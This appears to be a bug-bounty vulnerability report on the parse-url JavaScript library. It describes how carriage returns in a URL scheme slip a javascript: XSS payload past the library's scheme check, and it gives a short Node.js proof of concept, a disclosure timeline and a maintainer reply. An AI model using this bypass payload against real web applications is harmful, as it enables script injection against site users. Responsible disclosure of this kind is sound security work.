Bypass of last fix in ionicabizau/parse-url
Valid
Reported on
Jun 7th 2022
Description
The last fix can be bypassed: in this line the cases \r\r and even a bare \r also need to be considered.
Proof of Concept
const http = require("http");
const parseUrl = require("parse-url");

// Carriage returns embedded in the scheme: a browser strips them before parsing,
// so it sees javascript://%0aalert(1) while the library's check does not.
const url = parseUrl('jav\r\r\rascript://%0aalert(1)');
console.log(url);

const server = http.createServer((request, response) => {
  response.writeHead(200);
  // Deny-list check on the parsed scheme; the PoC input slips past it
  if (url.scheme !== "javascript" && url.scheme !== null) {
    response.end("<a href='" + url.href + "'>Wowww!</a>");
  } else {
    response.end("Nooo!");
  }
});

server.listen(80, "127.0.0.1", function () {
  console.log("http://" + this.address().address + ":" + this.address().port);
});
Impact
With this bypass an attacker can place arbitrary malicious JavaScript on web pages that rely on the parsed scheme to reject javascript: links.
We are processing your report and will contact the ionicabizau/parse-url team within 24 hours. (2 months ago)
amammad modified the report (three times, 2 months ago)
We have contacted a member of the ionicabizau/parse-url team and are waiting to hear back. (2 months ago)
amammad modified the report (2 months ago)
:))
I am struggling with this: why did I send a complete fix in another report of mine? I think this report can be fixed and ignored if we use my solution from the other report to patch this vulnerability!
Is it possible to only get the bounty and not release a CVE for this report, please?
We have sent a follow up to the ionicabizau/parse-url team. We will try again in 7 days. (2 months ago)
We have sent a second follow up to the ionicabizau/parse-url team. We will try again in 10 days. (2 months ago)
Hi there! Sorry for the late reply and thank you for this report. I am working on fixing this.
The researcher's credibility has increased: +7
Ionică Bizău (Johnny B.) has been awarded the fix bounty